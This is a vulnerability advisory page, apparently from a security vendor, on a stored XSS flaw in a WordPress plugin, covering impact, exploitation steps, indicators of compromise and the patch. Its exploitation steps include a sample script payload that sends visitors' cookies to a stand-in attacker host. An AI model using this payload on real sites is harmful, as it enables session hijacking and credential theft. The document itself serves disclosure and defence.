CVE-2025-15021: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-15021 is a Stored Cross-Site Scripting (XSS) vulnerability in the Gotham Block Extra Light plugin for WordPress, affecting all versions up to and including 1.5.0. The flaw stems from insufficient input sanitization and output escaping in admin settings, allowing authenticated attackers with administrator-level permissions to inject arbitrary web scripts into pages. The vulnerability is limited in scope: it only affects WordPress multi-site installations or single-site installations where unfiltered_html has been disabled. It was published on January 14, 2026, and carries a CVSS v3.1 base score of 4.4 (Medium), assigned by Wordfence (Wordfence, Red Hat CVE).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The root cause is that the plugin fails to properly sanitize user-supplied input in admin settings fields and does not escape output when rendering those values on pages. An authenticated attacker with administrator privileges can save malicious JavaScript payloads through the plugin's settings interface; these scripts are then persistently stored and executed in the browser of any user who visits an affected page. The vulnerable code paths are identifiable in gothamblock.php at lines 463, 470, 495, 500, 504, 519, 564, and 578 (WordPress Trac).

Impact

Successful exploitation allows an attacker to persistently inject and execute arbitrary JavaScript in the context of other users' browsers on affected WordPress sites. This can lead to session hijacking, credential theft, defacement, or redirection of users to malicious sites. The scope is marked as "Changed" in the CVSS vector, indicating the impact extends beyond the plugin itself to the broader WordPress site and its visitors. Confidentiality and integrity are both assessed as Low impact, with no availability impact (Wordfence).

Exploitability

Exploitation requires authenticated access with administrator-level privileges, which significantly limits the attack surface. The vulnerability is further constrained to multi-site WordPress installations or those with unfiltered_html disabled, reducing the population of affected targets. No public proof-of-concept exploit code or in-the-wild exploitation has been reported. The EPSS score is approximately 0.022% (0.000220), indicating a very low probability of exploitation in the near term. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence, Red Hat CVE).

Exploitation steps

  1. Reconnaissance: Identify a WordPress multi-site installation or a site with unfiltered_html disabled that has the Gotham Block Extra Light plugin (version ≤ 1.5.0) installed and active.
  2. Obtain administrator credentials: Gain access to an account with administrator-level permissions or higher on the target WordPress site (e.g., through phishing, credential stuffing, or social engineering).
  3. Navigate to plugin settings: Log in to the WordPress admin dashboard and navigate to the Gotham Block Extra Light plugin settings page.
  4. Inject malicious payload: Enter a crafted JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into one of the vulnerable admin settings fields corresponding to the unsanitized input points in gothamblock.php.
  5. Save settings: Submit/save the settings, causing the malicious script to be stored in the WordPress database.
  6. Trigger execution: When any user (including non-admin visitors) accesses a page that renders the injected plugin output, the stored script executes in their browser, enabling session hijacking or other client-side attacks (WordPress Trac, Wordfence).

Indicators of compromise

  • Logs: WordPress admin audit logs showing unexpected changes to Gotham Block Extra Light plugin settings by administrator accounts, particularly from unfamiliar IP addresses or at unusual times.
  • Database: Presence of JavaScript tags or encoded script content (e.g., <script>, javascript:, onerror=, onload=) in the WordPress options table entries associated with the Gotham Block Extra Light plugin.
  • Network: Outbound requests from site visitors' browsers to unknown external domains shortly after loading pages that render Gotham Block Extra Light content, potentially indicating cookie or credential exfiltration.
  • File System: Unexpected modifications to gothamblock.php or related plugin files, which could indicate a secondary compromise following XSS exploitation.

Mitigation and workarounds

A patch was released in plugin changeset 3438393, which addresses the insufficient sanitization and escaping issues (WordPress Trac Changeset). WordPress site administrators should update the Gotham Block Extra Light plugin to the patched version (beyond 1.5.0) as soon as it is available through the WordPress plugin repository. As an interim workaround, administrators can disable the plugin on affected multi-site installations or re-enable unfiltered_html where policy permits, though neither is a permanent fix. Restricting administrator account access and enforcing strong authentication (e.g., MFA) reduces the risk of an attacker obtaining the credentials needed to exploit this vulnerability.

Community reactions

The vulnerability was discovered and reported by Wordfence, which assigned the CVE and published the initial advisory on January 14, 2026. No significant broader media coverage or notable community commentary beyond standard vulnerability database aggregation has been observed for this low-severity, limited-scope issue (Wordfence).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management